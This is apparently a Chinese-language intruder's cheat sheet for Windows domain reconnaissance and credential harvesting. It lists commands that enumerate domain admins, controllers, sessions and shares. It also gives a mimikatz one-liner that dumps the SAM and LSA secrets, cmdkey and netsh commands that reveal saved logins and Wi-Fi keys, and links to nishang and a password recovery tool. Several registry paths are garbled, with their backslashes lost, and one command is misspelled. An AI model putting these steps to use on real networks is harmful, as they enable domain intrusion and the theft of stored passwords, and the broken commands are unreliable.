信息收集命令:
query user || qwinsta 查看當前在線用戶
net user 查看本機用戶
net user /domain 查看域用戶
net view & net group "domain computers" /domain 查看當前域計算機列表 第二個查的更多
net view /domain 查看有幾個域
net view \\\\dc 查看 dc 域內共享文件
net group /domain 查看域裏面的組
net group "domain admins" /domain 查看域管
net localgroup administrators /domain /這個也是查域管,是升級爲域控時,本地賬戶也成爲域管
net group "domain controllers" /domain 域控
net time /domain
net config workstation 當前登錄域 - 計算機名 - 用戶名
net use \\\\域控(如pc.xx.com) password /user:xxx.com\username 相當於這個帳號登錄域內主機,可訪問資源
ipconfig
systeminfo
tasklist /svc
tasklist /S ip /U domain\username /P /V 查看遠程計算機 tasklist
net localgroup administrators && whoami 查看當前是不是屬於管理組
netstat -ano
nltest /dclist:xx 查看域控
whoami /all 查看 Mandatory Label uac 級別和 sid 號
net sessoin 查看遠程連接 session (需要管理權限)
net share 共享目錄
cmdkey /l 查看保存登陸憑證
echo %logonserver% 查看登陸域
spn –l administrator spn 記錄
set 環境變量
dsquery server - 查找目錄中的 AD DC/LDS 實例
dsquery user - 查找目錄中的用戶
dsquery computer 查詢所有計算機名稱 windows 2003
dir /s *.exe 查找指定目錄下及子目錄下沒隱藏文件
arp -a
發現遠程登錄密碼等密碼 netpass.exe 下載地址:
https://www.nirsoft.net/utils/network_password_recovery.html
獲取 window vpn 密碼:
mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit
wifi 密碼:
netsh wlan show profile 查處 wifi 名
netsh wlan show profile WiFi-name key=clear 獲取對應 wifi 的密碼
ie 代理
reg query "HKEY_USERSS-1-5-21-1563011143-1171140764-1273336227-500SoftwareMicrosoftWindowsCurrentVersionInternet
Settings" /v ProxyServer
reg query "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet Settings"
pac 代理
reg query "HKEY_USERSS-1-5-21-1563011143-1171140764-1273336227-500SoftwareMicrosoftWindowsCurrentVersionInternet
Settings" /v AutoConfigURL //引子 t0stmail
powershell-nishang
https://github.com/samratashok/nishang
參考文章
• https://www.0dayhack.com/post-523.html
• http://www.freebuf.com/articles/web/170970.html
• https://mp.weixin.qq.com/s/U2MqcjA_YmMlajJzvDCZZw